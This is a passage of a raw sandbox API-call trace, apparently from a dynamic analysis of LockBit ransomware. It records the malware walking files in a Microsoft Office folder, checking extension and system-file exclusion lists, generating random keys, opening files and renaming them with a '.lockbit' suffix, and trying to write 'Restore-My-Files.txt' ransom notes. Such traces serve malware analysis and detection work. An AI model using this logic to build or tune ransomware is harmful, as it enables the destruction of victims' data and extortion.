[0197.280] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0197.280] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0197.280] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0197.280] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0197.280] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0197.280] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0197.280] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0197.280] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0197.280] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0197.280] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0197.280] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0197.280] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0197.280] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0234687.GIF") returned 1 [0197.280] lstrcmpiW (lpString1="ntldr", lpString2="J0234687.GIF") returned 1 [0197.280] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0234687.GIF") returned 1 [0197.280] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0234687.GIF") returned -1 [0197.280] lstrcmpiW (lpString1="autorun.inf", lpString2="J0234687.GIF") returned -1 [0197.280] lstrcmpiW (lpString1="thumbs.db", lpString2="J0234687.GIF") returned 1 [0197.280] lstrcmpiW (lpString1="iconcache.db", lpString2="J0234687.GIF") returned -1 [0197.280] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.280] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0234687.GIF") returned=".GIF" [0197.280] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0197.280] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0197.280] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0197.280] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0197.280] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0197.281] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0197.281] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0197.281] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0197.281] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0197.281] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0197.281] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0197.281] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0197.281] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0197.281] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0197.281] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0197.281] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0197.281] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0197.281] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0197.281] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0197.281] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0197.281] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0197.281] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0197.281] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0197.281] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0197.281] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0197.281] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0197.281] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0197.281] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0197.281] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0234687.GIF.lockbit") returned 70 [0197.281] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0234687.GIF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0234687.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0197.283] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.283] malloc (_Size=0x40068) returned 0x3df0008 [0197.283] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3407) returned 1 [0197.283] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.284] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.284] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.284] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.284] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.284] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.284] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0197.289] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0234687.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0234687.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.289] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.289] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0197.289] free (_Block=0x1fa2ed8) [0197.289] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0234687.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.289] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.289] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.289] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85566d00, ftCreationTime.dwHighDateTime=0x1be911f, ftLastAccessTime.dwLowDateTime=0xbd5853c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x85566d00, ftLastWriteTime.dwHighDateTime=0x1be911f, nFileSizeHigh=0x0, nFileSizeLow=0x1820, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0235241.WMF", cAlternateFileName="")) returned 1 [0197.289] lstrcmpiW (lpString1=".", lpString2="J0235241.WMF") returned -1 [0197.289] lstrcmpiW (lpString1="..", lpString2="J0235241.WMF") returned -1 [0197.289] PathFindExtensionW (pszPath="J0235241.WMF") returned=".WMF" [0197.289] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.289] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.289] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.289] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.289] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.290] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.290] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.290] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.290] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.290] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.290] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.290] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.290] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.290] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.290] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.290] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.290] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.290] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.290] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.290] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.290] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.290] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.290] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.290] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.290] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.290] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.290] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.290] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.291] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.291] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.291] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.291] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.291] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.291] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.291] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.291] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.291] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.291] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.291] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.291] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.291] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.291] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.291] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.291] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.291] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.291] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.291] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.291] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0235241.WMF") returned 1 [0197.291] lstrcmpiW (lpString1="ntldr", lpString2="J0235241.WMF") returned 1 [0197.291] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0235241.WMF") returned 1 [0197.291] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0235241.WMF") returned -1 [0197.291] lstrcmpiW (lpString1="autorun.inf", lpString2="J0235241.WMF") returned -1 [0197.291] lstrcmpiW (lpString1="thumbs.db", lpString2="J0235241.WMF") returned 1 [0197.292] lstrcmpiW (lpString1="iconcache.db", lpString2="J0235241.WMF") returned -1 [0197.292] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.292] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0235241.WMF") returned=".WMF" [0197.292] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.292] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.292] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.292] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.292] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.292] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.292] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.292] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.292] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.292] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.292] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.292] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.292] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.292] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.292] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.292] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.292] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.292] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.292] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.292] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.292] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.292] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.292] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.293] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.293] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.293] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.293] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.293] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.293] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0235241.WMF.lockbit") returned 70 [0197.293] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0235241.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0235241.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0197.294] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.294] malloc (_Size=0x40068) returned 0x3df0008 [0197.295] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=6176) returned 1 [0197.295] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.295] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.295] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.295] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.296] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.296] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.296] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0197.300] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0235241.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0235241.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.300] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.301] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0197.301] free (_Block=0x1fa2ed8) [0197.301] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0235241.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.301] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.302] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.302] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c56b00, ftCreationTime.dwHighDateTime=0x1c0371d, ftLastAccessTime.dwLowDateTime=0xbd5853c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x4c56b00, ftLastWriteTime.dwHighDateTime=0x1c0371d, nFileSizeHigh=0x0, nFileSizeLow=0xa24, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0235319.WMF", cAlternateFileName="")) returned 1 [0197.302] lstrcmpiW (lpString1=".", lpString2="J0235319.WMF") returned -1 [0197.302] lstrcmpiW (lpString1="..", lpString2="J0235319.WMF") returned -1 [0197.302] PathFindExtensionW (pszPath="J0235319.WMF") returned=".WMF" [0197.302] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.302] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.302] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.302] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.302] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.302] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.302] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.302] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.302] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.302] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.302] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.302] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.302] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.302] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.302] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.302] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.302] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.303] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.303] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.303] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.303] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.303] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.303] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.303] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.303] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.303] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.303] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.303] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.303] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.303] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.303] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.303] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.303] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.303] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.303] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.303] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.303] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.303] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.304] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.304] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.304] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.304] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.304] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.304] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.304] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.304] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.304] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.304] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0235319.WMF") returned 1 [0197.304] lstrcmpiW (lpString1="ntldr", lpString2="J0235319.WMF") returned 1 [0197.304] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0235319.WMF") returned 1 [0197.304] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0235319.WMF") returned -1 [0197.304] lstrcmpiW (lpString1="autorun.inf", lpString2="J0235319.WMF") returned -1 [0197.304] lstrcmpiW (lpString1="thumbs.db", lpString2="J0235319.WMF") returned 1 [0197.304] lstrcmpiW (lpString1="iconcache.db", lpString2="J0235319.WMF") returned -1 [0197.304] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.304] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0235319.WMF") returned=".WMF" [0197.305] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.305] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.305] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.305] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.305] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.305] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.305] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.305] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.305] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.305] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.305] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.305] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.305] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.305] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.305] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.305] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.305] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.305] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.305] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.305] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.305] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.305] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.305] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.305] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.305] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.305] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.305] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.306] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.306] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0235319.WMF.lockbit") returned 70 [0197.306] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0235319.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0235319.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0197.307] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.307] malloc (_Size=0x40068) returned 0x3df0008 [0197.307] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2596) returned 1 [0197.307] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.308] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.308] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.308] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.308] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.308] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.308] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0197.313] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0235319.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0235319.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.313] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.313] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0197.313] free (_Block=0x1fa2ed8) [0197.313] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0235319.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") 